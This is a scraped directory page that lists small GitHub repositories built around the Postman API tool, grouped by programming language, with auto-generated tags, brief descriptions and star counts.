impactotecnologico/nodejs-postman-demo
description, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
karthickkumar07/nodejs-server-connection-with-postman
connection, description, node, nodejs, script, server
No description available. 0 stars 0 watchers 0 forks
muhammadfazeel/Simple-Blog-with-postman-and-nodejs
description, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
salmasalsabila/Pengumpulan-CRUD-nodejs-API-postman-
description, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
ShuvoHabib/simple-nodejs-api
description, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
ambuyo/nodejs-mongo-authentication
auth, authentication, data, mongo, mongod, mongodb, node, nodejs, schema, validating
validating mongodb data schema using nodejs and postman 0 stars 0 watchers 0 forks
awaism551/nodejs-crud
crud, crud api, fantastic, mongo, mongod, mongodb, node, nodejs, test, tested
Simple CRUD app using NODEjs, Expressjs and mongodb, app was tested using postman and all crud apis was doing fantastic 0 stars 0 watchers 0 forks
BijivemulaPraveenReddy/nodejs-REST_API
array, json, learn, node, nodejs
Here we are going to learn how to GET,POST,UPDATE,DELETE an json array using POSTMAN 0 stars 0 watchers 0 forks
Ciprianoe/Postman-Integracion-nodejs-express
express, node, nodejs
Postman-Integracion-nodejs-express prueba y evaluacion de SYNERGY 0 stars 0 watchers 0 forks
Denisijcu/nodejs_postman_mongodb
mongo, mongod, mongodb, node, nodejs
Backend Api 0 stars 0 watchers 0 forks
dimpu47/RESTfulAPI-with-nodejs
concept, node, nodejs
Building and Testing RESTful API with NodeJS and Postman -- Includes HATEOS concept 0 stars 0 watchers 0 forks
dinushchathurya/node-mysql-crud-app
api blueprint, asyncapi, chat, crud, express, json schema, mysql, node, nodejs, oauth, openid, sql
Create Restful API using nodejs, express and mysql 0 stars 0 watchers 0 forks
eddyyanto/nodejs-x18
node, nodejs
Revisiting nodejs (v10.11.0) and npm (v6.4.1) 0 stars 0 watchers 0 forks
gparasyris/back-end-nodejs
handling, node, nodejs, server
Simple Node JS Express server handling POST, GET, PUT, DELETE requests. 0 stars 0 watchers 0 forks
gsuscastellanosSC/CursoBackendConNode.js
backend, event, form, http, https, node, nodejs, program
Introducción y bienvenida Guillermo Rodas será tu profesor en este curso, él tiene más 6 años dedicado a programar sólo en JavaScript y forma parte del equipo de Auth0, además de ser Google Developer Expert (GDE) en Web Technologies y organizador de eventos como Medellin CSS y CSS Conf. Requisitos antes de iniciar: Node y NPM Editor de texto ya sea vsCode, Atom o Sublime Text Navegador Chrome o Firefox Extensión JSON viewer Postman en @platzi https://platzi.com/clases/1646-backend-nodejs/22012-introduccion-y-bienvenida/ 💚💚💚 0 stars 0 watchers 0 forks
jakeauyeung/postman
express, node, nodejs
帮我买海外OM前端推送到PROD程序,基于express,nodejs 0 stars 0 watchers 0 forks
mayankpatel1004/nodejs-express-mvc-mysql
api blueprint, asyncapi, express, json schema, mysql, node, nodejs, oauth, openid, sql
Nodejs with mysql, Express , MVC, Postman 0 stars 0 watchers 0 forks
mitukulavenkatesh/nodejs_code_postman
crud, node, nodejs, operation, operations
This is for the crud operations through Postman get,post,put,delete 0 stars 0 watchers 0 forks
mustafaalkan64/nodejs-express-filter-api-sample-project
express, filter, node, nodejs, sample
Nodejs Express Filter Api Sample Project 0 stars 0 watchers 0 forks
N0NU/nodejs-ts-api
collection, collections, http, https, link, node, nodejs, postman collection
postman collection link: https://www.getpostman.com/collections/415fe570cfb81c6393e8 0 stars 0 watchers 0 forks
psjoshi20/todo
api blueprint, asyncapi, express, json schema, node, nodejs, oauth, openid, rest, restapi, sql, todo
todo app using -psql-seq-nodejs-express-postman-restapi 29dec2019 0 stars 0 watchers 0 forks
salesh/nodejs-upload-file
file, node, nodejs, test, upload
Postman upload file txt/pdf test 0 stars 0 watchers 0 forks
SofianeHadjadj/l3_nodejs_apirest_2018
application, node, nodejs, rest
Projet de L3 d'application web en Node.js + Express.js + MongoDB + API IGDB (fonctionne avec Postman) 0 stars 0 watchers 0 forks
sweb1433/serverless-api-monk
function, functions, lambda, node, nodejs, server, serverless
CRUD api using nodejs, serverless, lambda functions and postman and monk. 0 stars 0 watchers 0 forks
techinfo-youtube/MongoDB_Nodejs_CRUD_operations
crud, frontend, mongo, mongod, mongodb, node, nodejs, operation, operations, tool, youtube
complete mongodb and nodejs crud operation using postman tool not frontend used!! 0 stars 0 watchers 0 forks
thangpdtt/nodejs_babeljs_expressjs_mongodb_passport_tests_tdd_postman
auth, authenticate, babel, data, express, expressjs, framework, mongo, mongod, mongodb, node, nodejs, passport, store, test, tests
The simple app that used express framework with babel compiler run on nodejs. This used passport to authenticate and MongoDb to store data. 0 stars 0 watchers 0 forks
Thom9521/RESTful-api-nodejs
lavet, node, nodejs, test
RESTful api lavet med nodejs og testet med postman 0 stars 0 watchers 0 forks
thomasborland/nodejs_postman_site
node, nodejs, script, scripts, site, test, website
NodeJS website to run POSTMan REST test scripts 0 stars 0 watchers 0 forks
treetrunkz/nodeapp
access, accessed, application, dynamic, dynamically, express, install, interface, list, module, modules, mongo, mongoose, multiple, node, nodejs, parse, parser, server, todo, tree, user, users
This is a nodejs application. It is a todo list that can be accessed and created by multiple users. The API is accessed by Postman. The server and interface is set up to POST and GET dynamically. To populate node_modules `npm install ejs, express, mongoose, body-parser --save -g` + tsc -w 0 stars 0 watchers 0 forks
Victor10-m/mysql-nodejs-rest-api
api blueprint, asyncapi, json schema, mysql, node, nodejs, oauth, openid, rest, sql, todo
Este repositorio tiene conexion a BD en mysql usa metodos get, post, put, delete desde postman 0 stars 0 watchers 0 forks
vishalbhardwaj26/hw-rest-express-nodejs
exercise, express, node, nodejs, rest
Elaborated exercise on rest+express+nodejs. 0 stars 0 watchers 0 forks
yoyoucay/belajar-api-nodejs
belajar, node, nodejs
belajar membuat API , Create-Read-Update-Delete dengan Aplikasi bantuan (Postman) 0 stars 0 watchers 0 forks

javascript (16 listings) (Back to Top)

Manojvg1995/GET-POST-method-call-using-jquery-and-javascript
fake, java, javascript, jquery, method, query, script, upload, uploading
Hello , In this project I'm uploading how Call get and post method using jquery and javascript using online fake apis. 5 stars 5 watchers 1 forks
benfluleck/random-phone-number-generator
file, generate, generator, implements, java, javascript, order, phone, random, script, spec
Random number generator is a full stack javascript app that implements a simple way to generate phone numbers in a file in an order specified 4 stars 4 watchers 2 forks
hakaneroztekin/glassdoor-top-rated-scraper-javascript
java, javascript, scraper, script, wondered
💯 Ever wondered the top rated companies in Istanbul on Glassdoor? ☕ Tech stack: Java 11, Spring Boot, Spring MVC, JavaScript, React, Docker, PostgreSQL, RESTful API, Hibernate, Maven, Material UI, IntelliJ, Postman, SourceTree, Git 3 stars 3 watchers 1 forks
elsaVelazquez/cybersecurity
auth, authentication, java, javascript, mongo, script, security
authentication using RESTful API, Vuejs, javascript, postman, mongoDB 1 stars 1 watchers 0 forks
hakaneroztekin/todo-app-javascript
action, java, javascript, list, script, to do, todo
📜 Keep your fancy list of actions to do. ☕Tech stack: JavaScript, NodeJS, ExpressJS, RESTful API, MySQL, Postman, HTML, CSS and WebStorm 1 stars 1 watchers 0 forks
nikandlv/postman-patcher
java, javascript, patch, render, script
Allows postman to render javascript in preview 0 stars 0 watchers 1 forks
CarlosEduardoFerreiraRamos/js-postman-newman-csv-writer
collection, data, file, java, javascript, newman, postman collection, script, writer
A javascript csv file writer, receving data from the newman api based on a postman collection 0 stars 0 watchers 0 forks
theuggla/javascript-at
application, applications, client, concept, java, javascript, program, ranging, script, server, servers, standalone, test, testing
ranging from small programs to full applications testing out javascript concepts, both as standalone applications, servers and client applications 0 stars 0 watchers 0 forks
401-advanced-javascript-floyd/Postman-Resty
advance, advanced, java, javascript, script
Postman Type of APP 0 stars 0 watchers 0 forks
ankurjain00/postman-javascript-api-tesing
execution, implementation, java, javascript, sample, script, tesing, test, tests
This is a sample implementation of API tests in Postman with JavaScript with execution in Newman 0 stars 0 watchers 0 forks
cpalmer-atx/RESTful-API
course, engine, engineering, group, java, javascript, mongo, script, software
A group project for my Spring 2019 software engineering course implementing a RESTful API using mongoDB, Postman, and javascript. 0 stars 0 watchers 0 forks
k4l397/newman-dr
client, collection, collections, directory, java, javascript, newman, runs, script, tool, wraps
This is a javascript tool that wraps the newman postman client and runs all collections in a directory. 0 stars 0 watchers 0 forks
nand1234/newman-javascript
execution, java, javascript, newman, problem, script, test
problematically postman test script execution using Newman 0 stars 0 watchers 0 forks
rathahin/postman-loader-javascript
config, configuration, java, javascript, script, util, utilities
A utilities to load postman as request configuration 0 stars 0 watchers 0 forks
Solijons/Postman-Tests
java, javascript, sample, script, syntax, test, tests, writing
Here is sample of writing tests in post using javascript syntax 0 stars 0 watchers 0 forks
VueVindicator/Blockchain
blockchain, chai, describes, express, java, javascript, network, script
This is a short project that describes the workings of a blockchain network. Built with javascript, express.js and postman 0 stars 0 watchers 0 forks

rails (11 listings) (Back to Top)

ghoshnirmalya/linkedin-clone-rails-backend
backend, clone, link, linkedin, rails, rocket, software
:rocket: API to power a software similar to LinkedIn 5 stars 5 watchers 0 forks
RailsBank/railsbank-postman-collection
bank, collection, rails
API Testing/Browsing with Postman 0 stars 0 watchers 5 forks
Vachman/rails_to_postman
rails, route, routes
Export rails routes to Postman REST Client 0 stars 0 watchers 1 forks
johannescarlen/grails-simple-app
auth, authentication, class, grails, json, play, playaround, rails, test, testing
A playaround with Grails. Creating a REST post and get with basic authentication. Also some simple domain class scaffolding. Import the postman.json into Postman for API testing. 0 stars 0 watchers 0 forks
Chhekur/postman-assignment-rails
assignment, description, rails, script
No description available. 0 stars 0 watchers 0 forks
Wolox/postman-training-rails
description, rails, script, training
No description available. 0 stars 0 watchers 0 forks
chrisdetmering/first_routes_and_controllers
controller, endpoint, endpoints, interacted, rails, route, routes
I used rails to make my first API endpoints (routes) and I made controllers. I also interacted with them through postman. 0 stars 0 watchers 0 forks
md-farhan-memon/site-scraper-rails-api
content, rails, scraper, site
HTML Tag content Scraper - API, PgSql, Rails 5 0 stars 0 watchers 0 forks
painfulcranium/partNumberGenerator
angular, application, collection, front end, grails, postman collection, rails, sample, test
A sample Demo application with an angular front end, a grails REST API, and a postman collection to test with 0 stars 0 watchers 0 forks
parkerleblanc01/rails_template
auth, rails, resource, sample, source, spec, swagger, template, test, tests, token
Rails 6 API template with token auth, swagger, rspec tests, postman and a sample resource. 0 stars 0 watchers 0 forks
trevligare/postman
document, documentation, living, rails
Postman "living documentation" of the rails api 0 stars 0 watchers 0 forks

golang (9 listings) (Back to Top)

AlexFerreras/Golang-simple-crud-operation-web-service-
crud, golang, lang, operation, service
Simple complete and practice golang crud operation (WEB SERVICE), to use it. you most use Postman 0 stars 0 watchers 0 forks
atljoseph/api.go.josephgill.io
api blueprint, asyncapi, bucket, data, database, event, eventually, golang, image, images, json schema, lang, manages, mysql, oauth, openid, progress, site, sql, website
This is a work in progress which will eventually become part of my website. It is a golang api which manages a mysql database and images in an s3 bucket. 0 stars 0 watchers 0 forks
codeasashu/golang-postman-parser
collection, golang, implementation, lang, parse, parser, postman collection
A postman collection parser implementation in Golang 0 stars 0 watchers 0 forks
patabhi/gocrudapi
crud, crud api, data, database, file, golang, lang, postgres, server, server.
crud api in golang with postgres database. 1> Run server.go file. 2> Test the api using postman. 0 stars 0 watchers 0 forks
RedaZenagui/golangProject
endpoint, exposes, golang, graph, graphql, lang, server, service, struct
Creating a server that exposes a graphql endpoint that returns a struct taken from gRPC service when queried via something like postman. 0 stars 0 watchers 0 forks
RedaZenagui/golangTest
curl, endpoint, exposes, golang, graph, graphql, lang, server
Creating a server that exposes a graphql endpoint that returns "This is the answer about the Query !" when queried via something like curl or postman. 0 stars 0 watchers 0 forks
ssebs/gostman
client, golang, http, lang
golang POSTman (http client) 0 stars 0 watchers 0 forks
stanhordiyenko/go-localapi
golang, lang, learn, local, locally, service, tool
This is a small golang API service that can be run locally to learn how to interact with it in Postman on the like tool. 0 stars 0 watchers 0 forks
takahiromiyamoto/go-postmancollection
collection, golang, lang, model, object, postman collection
go-postmancollection is a postman collection object model for golang. 0 stars 0 watchers 0 forks

typescript (5 listings) (Back to Top)

stategen/stategen
flutter, free, freemarker, github, http, https, java, mock, provider, react, script, spring, stat, type, types, typescript
通用springMvc/springBoot分布式非强迫性全栈架构(java服务端,H5、iOS、andriod前端),内含大名鼎鼎的支付宝dalgen之freemarker开源实现之商用升级版dalgenX,是唯一支持迭代开发的全栈代码生成器,大量前、后端代码通过生成器生成,其中后端任意api直接生成前端网络调用、状态化、交互等相关代码,把前后端分离开发"拉"回来,目前前端已支持react(dva+umi+typescript)和flutter(provider),后续加入kotlin、swf。免去前端文档、调试、postman、mockjs...繁琐。开发中迭代生成,不改变原开发流程、生成80%代码,兼容后20%你自己的代码,拒绝挖坑! https://github.com/stategen/stategen 44 stars 44 watchers 10 forks
SiddharthaChowdhury/full-stack-auth
auth, babel, graph, jest, mongo, node, react, route, router, script, type, types, typescript
react.js, node.js, typescript, babel, webpack, graphQL, REST, mongoDB, jest, react-router, postman 5 stars 5 watchers 0 forks
itsmebhavin/nodejs-express-typescript-boilerplate
boiler, boilerplate, express, node, nodejs, script, type, types, typescript
Sample boilerplate project for node.js, express using TypeScript and Gulp. 0 stars 0 watchers 8 forks
martinc278/Backend-Server_typescript
backend, script, server, test, tested, type, types, typescript
Created and deployed a backend server using typescript, used Framework Nest and tested with postman 0 stars 0 watchers 0 forks
nkeenan38/k6-from-postman
collection, collections, postman collection, postman collections, script, test, tests, type, types, typescript
Generates K6 tests in typescript from postman collections 0 stars 0 watchers 0 forks

ruby (5 listings) (Back to Top)

rubyDoomsday/curly
command, command line, curl, ruby
linux command line postman without all the fluff 1 stars 1 watchers 1 forks
ctrl-break/ruby_basics_postman_challenge
basics, ruby
0 stars 0 watchers 1 forks
IsaiaSilva/httparty_pokeapi
automat, automation, http, party, ruby, spec
API automation with httparty + postman + rspec + ruby gem 0 stars 0 watchers 1 forks
josephbuchma/postman-ruby
collection, collections, export, exported, http, ruby
Parse & make http requests from Postman's (getpostman.com) exported collections (Collection V2) 0 stars 0 watchers 1 forks
ruby4mag/postman
description, ruby, script
No description available. 0 stars 0 watchers 0 forks

swift (4 listings) (Back to Top)

SwiftDil/swiftdil-postman
swift
SwiftDil's Official Postman API Collections 0 stars 0 watchers 4 forks
swiftinc/gpi-connector-backoffice-simulator
collection, demonstrating, integrating, office, postman collection, principles, rating, schema, swift, validation
This is a postman collection for integrating with Tracker APIs and Pre-Validation API demonstrating the principles of TLS, LAU and JSON schema validation. 0 stars 0 watchers 2 forks
didats/PostmanToAPIInput
file, swift
My first code using Go. Converting Postman JSON file to APIInput.swift 0 stars 0 watchers 0 forks
Reybravin/smack
auth, mongo, service, slack, swift
iOS swift slack-like app (SWRevealViewController, CocoaPods: SwiftyJSON, Alamofire, Socket.io; Heroku, mLab MongoDB; NodeJS, Postman, Robomongo; auth service) 0 stars 0 watchers 0 forks

phpunit (1 listings) (Back to Top)

semlabs/newman-reporter-phpunit
mlab, newman, phpunit, report, reporter, style, unit
A newman reporter with a PHPUnit like style 2 stars 2 watchers 1 forks